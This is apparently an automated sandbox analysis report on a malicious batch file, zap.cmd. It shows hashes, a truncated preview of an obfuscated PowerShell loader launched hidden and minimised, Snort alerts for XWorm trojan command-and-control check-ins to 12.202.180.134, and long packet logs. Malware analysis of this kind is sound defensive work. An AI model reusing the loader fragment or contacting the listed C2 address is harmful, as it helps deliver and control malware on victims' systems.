                                                                                  SHA-512:2433FC1A9EB9A6BA9CA9C9D9E01DE7CFA4889B3B635EF45D91450E4967E585C0FFFEB725751CB6149896265FD7ED208E58227146A7C37999351584C5EB81B8F7
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...J.S...C...E...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...A ..E...@...E.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW<2.X....../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X|.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X|.....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X|.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X|.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X......u...........

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with very long lines (6229), with no line terminators
                                                                                  Entropy (8bit):5.242308669741453
                                                                                  TrID:
                                                                                    File name:zap.cmd
                                                                                    File size:6'229 bytes
                                                                                    MD5:5521519d477ec8b95c87ad7ffc115145
                                                                                    SHA1:551da12ea131d7bf60646a35cfcd8a3a16905f94
                                                                                    SHA256:3a399d16db8e57cf727a03f4d9ad33624c08571c0f0b2e4120095e4622c22e19
                                                                                    SHA512:46afb8d1b705d1d380b739898a74be66593b04adb9d27f3cacfdfe16c896ee08579e5c1aea410fbdb4c5116987f99e0ed9396b35f6761dbab48eeef1d425f96f
                                                                                    SSDEEP:96:JQyAIf/tbpCJ5gEpH6SpLiF2gzfTUOTgdGw9kVFVZM2jX3lQFgUXJYIpwsz:9ntb0S2uIOeD9kVFVZM2r8BX+M
                                                                                    TLSH:54D17E9C7727F2A480843372ECBDAE342B51461705A28D56C7567E2E72C46DDB22CF5C
                                                                                    File Content Preview:start /min powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrk

                                                                                    File Icon

                                                                                    Icon Hash:9686878b929a9886

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    05/23/24-21:14:15.572246TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497248896192.168.2.612.202.180.134
                                                                                    05/23/24-21:14:15.571396TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes88964972412.202.180.134192.168.2.6
                                                                                    05/23/24-21:13:17.087470TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497248896192.168.2.612.202.180.134
                                                                                    05/23/24-21:14:05.945641TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M288964972412.202.180.134192.168.2.6

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 23, 2024 21:12:13.661087036 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:13.661183119 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:13.661267042 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:13.672247887 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:13.672278881 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.179869890 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.179960012 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:14.182621956 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:14.182641029 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.182945967 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.194973946 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:14.238497019 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.550041914 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.550100088 CEST44349711104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:14.550276041 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:14.553390980 CEST49711443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:14.576656103 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:14.576694012 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:14.576872110 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:14.577152967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:14.577167034 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.313888073 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.314498901 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.342093945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.342120886 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.342499971 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.344588041 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.390495062 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.626719952 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.626744986 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.626766920 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.626909018 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.626925945 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.627763033 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.642628908 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.642647982 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.642807961 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.642822981 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.642940044 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.720503092 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.720527887 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.721863985 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.721882105 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.722177982 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.733735085 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.733771086 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.733830929 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.733843088 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.733855963 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.734277010 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.746326923 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.746356964 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.746536016 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.746536016 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.746547937 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.746602058 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.753276110 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.753298044 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.753420115 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.753437042 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.753494978 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.827153921 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.827191114 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.827301025 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.827316999 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.827392101 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.827392101 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.838725090 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.838742971 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.838970900 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.838998079 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.839482069 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.844374895 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.844391108 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.844471931 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.844484091 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.844582081 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.851392984 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.851418972 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.851548910 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.851560116 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.851820946 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.855089903 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.855108023 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.855287075 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.855297089 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.855776072 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.861567020 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.861584902 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.861928940 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.861938953 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.862088919 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.867062092 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.867084026 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.867192030 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.867199898 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.867268085 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.916250944 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.916271925 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.916670084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.916670084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.916698933 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.917340994 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.920783997 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.920800924 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.922499895 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.922513962 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.922585964 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.925210953 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.925229073 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.925380945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.925399065 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.925508022 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.928824902 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.928842068 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.930504084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.930525064 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.930681944 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.932612896 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.932637930 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.933584929 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.933584929 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.933605909 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.934261084 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.935866117 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.935883045 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.936054945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.936054945 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.936065912 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.936795950 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.938919067 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.938935995 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.939313889 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.939335108 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.939471960 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.941682100 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.941700935 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.942501068 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.942501068 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:15.942508936 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:15.942579031 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.010055065 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.010077953 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.010284901 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.010304928 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.010448933 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.013128042 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.013154984 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.013226032 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.013241053 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.013252020 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.014245987 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.015995026 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.016014099 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.016129017 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.016129017 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.016139030 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.016619921 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.019459009 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.019476891 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.019526005 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.019532919 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.019567966 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.019567966 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.020802021 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.020819902 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.020941973 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.020950079 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.022782087 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.023215055 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.023233891 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.023569107 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.023569107 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.023577929 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025162935 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025198936 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025437117 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.025437117 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.025448084 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.025789022 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.027703047 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.027719021 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.028001070 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.028012037 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.030791998 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.107316017 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.107356071 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.107425928 CEST4434971269.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:16.107980967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.107980967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:16.107980967 CEST49712443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:54.523184061 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:54.523238897 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:54.523329973 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:54.536477089 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:54.536498070 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.035041094 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.035209894 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.101843119 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.101872921 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.102159023 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.102224112 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.106045008 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.150502920 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423847914 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423919916 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.423945904 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423964024 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.423993111 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.424022913 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.429106951 CEST49720443192.168.2.6104.21.28.80
                                                                                    May 23, 2024 21:12:55.429131031 CEST44349720104.21.28.80192.168.2.6
                                                                                    May 23, 2024 21:12:55.479577065 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:55.479625940 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:55.479703903 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:55.480171919 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:55.480186939 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.160120964 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.160217047 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.172408104 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.172431946 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.172682047 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.174936056 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.175265074 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.218517065 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423201084 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423228025 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423269987 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423357964 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.423388958 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.423413992 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.423440933 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.446820021 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.446856022 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.446971893 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.447001934 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.447022915 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.447048903 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.450154066 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.450239897 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.450265884 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.450292110 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.458343983 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.458379030 CEST4434972169.31.136.17192.168.2.6
                                                                                    May 23, 2024 21:12:56.458398104 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:12:56.458739042 CEST49721443192.168.2.669.31.136.17
                                                                                    May 23, 2024 21:13:04.824142933 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:04.840533018 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:04.840625048 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:05.181579113 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:05.186736107 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:05.961226940 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:06.014358044 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:17.087470055 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:17.092504978 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:17.303709030 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:17.306169033 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:17.394809008 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:28.984081984 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:28.994693995 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:29.167359114 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:29.218009949 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:29.365566015 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:29.385613918 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:35.941828012 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:35.983464956 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:40.905682087 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:41.140084028 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:41.315942049 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:41.317681074 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:41.375447035 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:52.812100887 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:52.827723026 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:52.997001886 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:13:52.999346018 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:13:53.004462004 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:04.718307018 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:14:04.723925114 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:04.897773981 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:04.899465084 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:14:04.907270908 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:05.945641041 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:05.999200106 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:14:15.390856028 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:14:15.396459103 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:15.571396112 CEST88964972412.202.180.134192.168.2.6
                                                                                    May 23, 2024 21:14:15.572246075 CEST497248896192.168.2.612.202.180.134
                                                                                    May 23, 2024 21:14:15.585805893 CEST88964972412.202.180.134192.168.2.6

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 23, 2024 21:12:13.643240929 CEST6265953192.168.2.61.1.1.1
                                                                                    May 23, 2024 21:12:13.655230045 CEST53626591.1.1.1192.168.2.6
                                                                                    May 23, 2024 21:12:14.555010080 CEST5282553192.168.2.61.1.1.1
                                                                                    May 23, 2024 21:12:14.575926065 CEST53528251.1.1.1192.168.2.6
                                                                                    May 23, 2024 21:12:55.433022976 CEST5222753192.168.2.61.1.1.1
                                                                                    May 23, 2024 21:12:55.478770018 CEST53522271.1.1.1192.168.2.6
                                                                                    May 23, 2024 21:13:04.662554979 CEST5607853192.168.2.61.1.1.1
